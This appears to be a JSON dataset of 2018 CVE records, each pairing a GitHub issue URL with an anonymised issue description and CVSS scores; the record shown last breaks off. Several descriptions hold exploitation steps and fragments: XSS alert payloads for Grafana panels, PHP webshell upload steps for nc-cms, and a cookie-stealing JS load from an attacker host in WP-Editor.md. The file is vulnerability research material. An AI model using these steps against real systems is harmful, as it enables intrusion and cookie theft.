        "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2 APITAG NUMBERTAG SP2 allows XSS via the vulnerable function named APITAG defined in the file which is used to display the page numbers list at the bottom of some templates. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18622",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/8",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/8",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-10-23T13:31:09Z",
        "description": "there is a xss. POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG Connection: close APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18623",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/15293",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/15293",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2019-02-07T05:48:46Z",
        "description": "XSS: Option to disable or sanitize html source in some panels. Grafana is vulnerable to XSS vulnerability because the panels included in the description below can contain html. Therefore, the option to disable or filter the html source must be provided. > APITAG Component] > APITAG > Dashboard > Text Panel > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Add Panel > Text NUMBERTAG Edit Text Panel NUMBERTAG Set Options > Mode(html) & Content( APITAG alert('XSS'); APITAG ) > > > > APITAG Component] > APITAG > Dashboard > Table Panel > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Add Panel > Table NUMBERTAG Edit Table Panel NUMBERTAG Set Column Styles > : Check Render value as link > : set Url(javascript:alert('XSS')) > > > > APITAG Component] > APITAG > Dashboard > All Panels > General > > APITAG Vectors NUMBERTAG APITAG Launch NUMBERTAG Access to any dashboard NUMBERTAG Dashboard Settings NUMBERTAG Set dashboard name(TEST APITAG alert('XSS') APITAG NUMBERTAG Save dashboard and go back to dashboard home NUMBERTAG Edit any panel NUMBERTAG Add link, in General NUMBERTAG Write the 'TEST' on the dashboard blank >",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18628",
        "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/458",
        "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/458",
        "Repo_new": "pippo-java/pippo",
        "Issue_Created_At": "2018-09-30T06:16:59Z",
        "description": "Java deserialization vulnerabi.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18635",
        "Issue_Url_old": "https://github.com/MailCleaner/MailCleaner/issues/53",
        "Issue_Url_new": "https://github.com/mailcleaner/mailcleaner/issues/53",
        "Repo_new": "mailcleaner/mailcleaner",
        "Issue_Created_At": "2018-10-22T11:06:56Z",
        "description": "Security bug Reflected XSS. Hi, I try ti register on your forum for reporting this bug, but my registration request didn't responded. so: Bug Title: Reflected XSS Product(s): APITAG CE NUMBERTAG APITAG CE NUMBERTAG Tested on: APITAG & APITAG APITAG URI: URLTAG BR, Milad Fadavvi",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18665",
        "Issue_Url_old": "https://github.com/NexxusUniversity/nexxuscoin/issues/2",
        "Issue_Url_new": "https://github.com/nexxusuniversity/nexxuscoin/issues/2",
        "Repo_new": "nexxusuniversity/nexxuscoin",
        "Issue_Created_At": "2018-10-26T01:42:39Z",
        "description": "a overflow vulnerability in APITAG hi, the APITAG function of APITAG seems to has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG _amount) { if APITAG == owner) { APITAG += _amount; balances[owner] += _amount; Transfer NUMBERTAG owner, _amount); } } you can see the test of this vulnerability, plz verify, thx! (yogurt. EMAILTAG .cn)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18666",
        "Issue_Url_old": "https://github.com/SwftCoins/SwftCoin/issues/1",
        "Issue_Url_new": "https://github.com/swftcoins/swftcoin/issues/1",
        "Repo_new": "swftcoins/swftcoin",
        "Issue_Created_At": "2018-10-26T02:10:39Z",
        "description": "a overflow vulnerability in APITAG . hi, the APITAG function of APITAG seems to has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG target, uint NUMBERTAG APITAG APITAG { APITAG += APITAG APITAG += APITAG Transfer NUMBERTAG this, APITAG Transfer(this, target, APITAG } you can see the test of this vulnerability in FILETAG , plz verify, thx! (yogurt. EMAILTAG .cn)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18667",
        "Issue_Url_old": "https://github.com/klenergy/ethereum-contracts/issues/1",
        "Issue_Url_new": "https://github.com/pylondata/ethereum-contracts/issues/1",
        "Repo_new": "pylondata/ethereum-contracts",
        "Issue_Created_At": "2018-10-26T01:46:11Z",
        "description": "a overflow vulnerability in APITAG hi, the APITAG function of APITAG seems to has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value. function APITAG target, uint NUMBERTAG APITAG APITAG { APITAG += APITAG APITAG += APITAG Transfer NUMBERTAG owner, APITAG Transfer(owner, target, APITAG } you can see the test of this vulnerability in FILETAG , plz verify, thx! (yogurt. EMAILTAG .cn)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18694",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/459",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/459",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-10-25T05:07:12Z",
        "description": "Monstra NUMBERTAG has Stored XSS via Uploading html file that has no extension.. Brief of this vulnerability In uploading process, Monstra file filter allow to upload no extension file. If html file that has no extension, it can be executed in browser as html, and it causes of Stored XSS. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version APITAG xss.) It can be executed in browser(I tested in Chrome ver NUMBERTAG APITAG Build NUMBERTAG bit)) as html and APITAG It can be executed in browser as html, and it causes of Stored XSS.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18699",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/43",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/43",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2018-10-27T06:42:47Z",
        "description": "OOB write. use the demo code and find a OOB write bug in APITAG NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./gpmfdemo APITAG NUMBERTAG Warning: set address range perms: large range FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18702",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/42",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/42",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-10-23T15:12:36Z",
        "description": "I found a SQL injection vulnerability. Vulnerabilities are generated in the background FILETAG If you have permission, we can use the injection to achieve file reading, and write the poc as follows ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18711",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/156",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/156",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-10-25T14:48:23Z",
        "description": "Two CSRF vulnerabilities that can change the super administrator's username and password. When the super administrator (uid NUMBERTAG logged in, there are NUMBERTAG important POST methods without CSRF protection, can change his username and password respectively. This can be achieved by cheating the super administrator to open the NUMBERTAG pages when he logged in. APITAG APITAG the username to 'hacker') ERRORTAG APITAG APITAG the password to NUMBERTAG ERRORTAG Or we made only NUMBERTAG page POC to make it easy to attack. APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18717",
        "Issue_Url_old": "https://github.com/Sunvas/Eleanor-CMS/issues/5",
        "Issue_Url_new": "https://github.com/sunvas/eleanor-cms/issues/5",
        "Repo_new": "sunvas/eleanor-cms",
        "Issue_Created_At": "2018-10-24T03:12:33Z",
        "description": "APITAG Site Scripting Vulnerability. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in might allow query pic then you can inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG login to administrator panel. APITAG below URL in browser which supports flash. URLTAG Fix: check the uploaded url.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18720",
        "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/2",
        "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/2",
        "Repo_new": "source-trace/yunucms",
        "Issue_Created_At": "2018-10-25T07:00:34Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG FILETAG insert POC FILETAG click on the submit button and come back homepage FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18722",
        "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/6",
        "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/6",
        "Repo_new": "source-trace/yunucms",
        "Issue_Created_At": "2018-10-25T08:18:25Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit FILETAG NUMBERTAG insert POC and click on the submit button FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18723",
        "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/3",
        "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/3",
        "Repo_new": "source-trace/yunucms",
        "Issue_Created_At": "2018-10-25T07:37:42Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit FILETAG NUMBERTAG insert POC and click on the submit button FILETAG APITAG FILETAG APITAG back the homepage FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18724",
        "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/5",
        "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/5",
        "Repo_new": "source-trace/yunucms",
        "Issue_Created_At": "2018-10-25T07:57:53Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG code FILETAG APITAG on the submit button and refresh FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18725",
        "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/4",
        "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/4",
        "Repo_new": "source-trace/yunucms",
        "Issue_Created_At": "2018-10-25T07:47:30Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit and insert POC FILETAG APITAG on the submit button and refresh FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18726",
        "Issue_Url_old": "https://github.com/source-trace/yunucms/issues/8",
        "Issue_Url_new": "https://github.com/source-trace/yunucms/issues/8",
        "Repo_new": "source-trace/yunucms",
        "Issue_Created_At": "2018-10-25T08:30:27Z",
        "description": "There is a stored xss vulnerability. An issue was discovered in yunucms NUMBERTAG There is a stored XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC APITAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG button to edit and insert code FILETAG APITAG on the submie button and refresh FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18749",
        "Issue_Url_old": "https://github.com/clarkgrubb/data-tools/issues/7",
        "Issue_Url_new": "https://github.com/clarkgrubb/data-tools/issues/7",
        "Repo_new": "clarkgrubb/data-tools",
        "Issue_Created_At": "2018-10-26T03:17:54Z",
        "description": "integer overflow. in the function tab to csv of tab to csv.c, when call write_wchars, the args end pass to the write_wchars can be overflow by the operation APITAG ,the will cause a APITAG APITAG poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18771",
        "Issue_Url_old": "https://github.com/yiifans/lulucms/issues/6",
        "Issue_Url_new": "https://github.com/yiifans/lulucms/issues/6",
        "Repo_new": "yiifans/lulucms",
        "Issue_Created_At": "2018-10-24T07:48:59Z",
        "description": "PATHTAG There is an arbitrary file upload vulnerability.. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18781",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/9",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/9",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-10-24T07:06:45Z",
        "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. APITAG NUMBERTAG SP2 allows XSS via the FILETAG f & keyword parameter. FILETAG Phink APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18782",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/10",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/10",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-10-24T07:10:43Z",
        "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2. Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG SP2 Reflected XSS exists in APITAG NUMBERTAG SP2 via the FILETAG ftype parameter. FILETAG Phink APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18842",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/201",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/201",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2018-10-29T10:32:39Z",
        "description": "CSRF Vulnerability exists in the file of Z BLOG NUMBERTAG CSRF Vulnerability exists in the file of Z BLOG NUMBERTAG APITAG URLTAG \u4e00\u4e9b\u6587\u4ef6\u53ef\u4ee5\u76f4\u63a5\u8bbf\u95ee\u4f1a\u5bfc\u81f4csrf_token\u6cc4\u6f0f\u3002 PATHTAG APITAG FILETAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18850",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5042",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5042",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-10-30T22:40:58Z",
        "description": "Remote Code Execution via malicious YAML configurations in some versions. Description An authenticated user with permission to modify deployment processes could upload a maliciously crafted YAML configuration, potentially allowing for remote execution of arbitrary code, running in the same context as the Octopus Server (for self hosted installations by default, SYSTEM). If this issue is of concern to you and your team, we strongly recommend upgrading to version APITAG . CVE ID Pending Affected versions Octopus Server: versions NUMBERTAG APITAG inclusive. Mitigation In any version affected by this issue, we recommend upgrading to version APITAG . Workarounds In situations where upgrade is not possible, running the octopus server built in worker as a service account with limited privileges may help to minimize the potential impact of such an occurrence, however this will not prevent attackers from attempting to chain other attacks against the server. URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18853",
        "Issue_Url_old": "https://github.com/spray/spray-json/issues/278",
        "Issue_Url_new": "https://github.com/spray/spray-json/issues/278",
        "Repo_new": "spray/spray-json",
        "Issue_Created_At": "2018-10-15T16:06:17Z",
        "description": "Denial of service when parsing a JSON object with an unexpected field that has a big number. APITAG quadratic_ decreasing of throughput when length of the JSON object is increasing On contemporary CPUs parsing of such JSON object with an additional field that has of NUMBERTAG decimal digits NUMBERTAG Mb) can took more than NUMBERTAG seconds: ERRORTAG Reproducible Test Case To run that benchmarks on your JDK NUMBERTAG FILETAG and/or ensure that it already installed properly: sbt about NUMBERTAG Clone APITAG repo: APITAG NUMBERTAG Enter to the cloned directory and checkout for the specific branch: APITAG NUMBERTAG Run benchmarks using a path parameter to your JDK: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18854",
        "Issue_Url_old": "https://github.com/spray/spray-json/issues/277",
        "Issue_Url_new": "https://github.com/spray/spray-json/issues/277",
        "Repo_new": "spray/spray-json",
        "Issue_Created_At": "2018-10-15T15:46:03Z",
        "description": "Denial of service when parsing JSON object with keys that have the same hash code. APITAG quadratic_ decreasing of throughput when number of JSON object fields (with keys that have the same hash code) is increasing On contemporary CPUs parsing of such JSON object (with a sequence of NUMBERTAG fields like below that is NUMBERTAG Mb) can took more than NUMBERTAG seconds: APITAG Below are results of the benchmark where size is a number of such fields: ERRORTAG Reproducible Test Case To run that benchmarks on your JDK NUMBERTAG FILETAG and/or ensure that it already installed properly: sbt about NUMBERTAG Clone APITAG repo: APITAG NUMBERTAG Enter to the cloned directory and checkout for the specific branch: APITAG NUMBERTAG Run benchmarks using a path parameter to your JDK: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18867",
        "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/506",
        "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/506",
        "Repo_new": "trippo/responsivefilemanager",
        "Issue_Created_At": "2018-10-30T09:42:28Z",
        "description": "SSRF not been fully fixed in FILETAG . In FILETAG we can download a pic in remote server. code in line NUMBERTAG Jul NUMBERTAG commit a fix to limit url in order to prohibit ssrf vuln CVETAG CVETAG but the fix only check the parm url startwith http:// or https:// we still can use http protocol to Probe intranet and attack intarnet APITAG Example: CODETAG and when the port is open will response APITAG URL\"} FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18873",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/184",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/184",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-10-31T06:55:17Z",
        "description": "NULL pointer dereference was discovered. An issue was discovered in Jasper NUMBERTAG There is a NULL pointer dereference at function ras_putdatastd CODETAG At the site of data define , the value of \"numcmpts\" is NUMBERTAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18874",
        "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/11",
        "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/11",
        "Repo_new": "gnat/nc-cms",
        "Issue_Created_At": "2018-10-31T07:07:54Z",
        "description": "There is an upload vulnerability in the edit html that can upload any files(eg:php webshell). Hello, I found that this cms may have some security problem you can edit your html on URLTAG and you can upload any evil file js you want NUMBERTAG click \"upfile or image\" FILETAG NUMBERTAG select a php file (eg: a evil webshell) FILETAG upload success! FILETAG the path: PATHTAG webshell : FILETAG FILETAG login webshell FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18888",
        "Issue_Url_old": "https://github.com/Leslie1sMe/laravelCMS/issues/4",
        "Issue_Url_new": "https://github.com/leslie1sme/laravelcms/issues/4",
        "Repo_new": "Leslie1sMe/laravelCMS",
        "Issue_Created_At": "2018-10-30T15:19:58Z",
        "description": "There are a File upload vulnerability allows attackers to upload PHP back door files. Vulnerability code at PATHTAG at line NUMBERTAG ERRORTAG The program uses some unreliable functions to judge whether it is a picture file or not. But the problem is Users can modify file attributes by truncating data. fix suggestion NUMBERTAG usr APITAG or \"===\"compare with file extension name APITAG files when saving files. The naming rule of file names uses time stamp to splice the MD5 value of random APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18909",
        "Issue_Url_old": "https://github.com/yaniswang/xhEditor/issues/37",
        "Issue_Url_new": "https://github.com/yaniswang/xheditor/issues/37",
        "Repo_new": "yaniswang/xheditor",
        "Issue_Created_At": "2018-11-03T04:57:52Z",
        "description": "XSS vulnerability in source code view. The editor's source code view allows attacker to bypass the input validation in default view by injecting javascript using IFRAME element. Proof of Concept: Injected the the payload APITAG APITAG into the editor's source code view.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18915",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/511",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/511",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-11-02T07:43:09Z",
        "description": "Infinite loop in APITAG function of APITAG The issue may be similar to the issue NUMBERTAG with the POC file provided, The vulue of the start will always be APITAG , so the condition will be true all the time. APITAG or the command APITAG can trigger the situation: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18919",
        "Issue_Url_old": "https://github.com/JaxsonWang/WP-Editor.md/issues/275",
        "Issue_Url_new": "https://github.com/lurenjiasworld/wp-editor.md/issues/275",
        "Repo_new": "lurenjiasworld/wp-editor.md",
        "Issue_Created_At": "2018-10-31T08:42:01Z",
        "description": "WP FILETAG exists XSS vulnerability. Vulnerability description When commentaries open markdown, administrators and editor roles can trigger XSS. Proof of concept First, open the comment area markdown \u63d2\u4ef6(plug in) APITAG NUMBERTAG md]( FILETAG FILETAG APITAG checked APITAG APITAG FILETAG FILETAG APITAG Second, log in with the administrator or editor role and comment in the comment APITAG payload used is: >[ FILETAG \"> APITAG alert NUMBERTAG APITAG FILETAG \"> APITAG alert NUMBERTAG APITAG Third, visit the comment page. You will find that the page has successfully executed the JS code NUMBERTAG URLTAG FILETAG NUMBERTAG Exploit Deploying FILETAG on attacker FILETAG content is the JS code you want to execute. >[ FILETAG \"> APITAG APITAG FILETAG \"> APITAG alert NUMBERTAG APITAG Test using JS code that gets cookie NUMBERTAG URLTAG FILETAG NUMBERTAG Successfully acquire part of cookie XD",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18920",
        "Issue_Url_old": "https://github.com/ethereum/py-evm/issues/1448",
        "Issue_Url_new": "https://github.com/ethereum/py-evm/issues/1448",
        "Repo_new": "ethereum/py-evm",
        "Issue_Created_At": "2018-11-01T07:53:25Z",
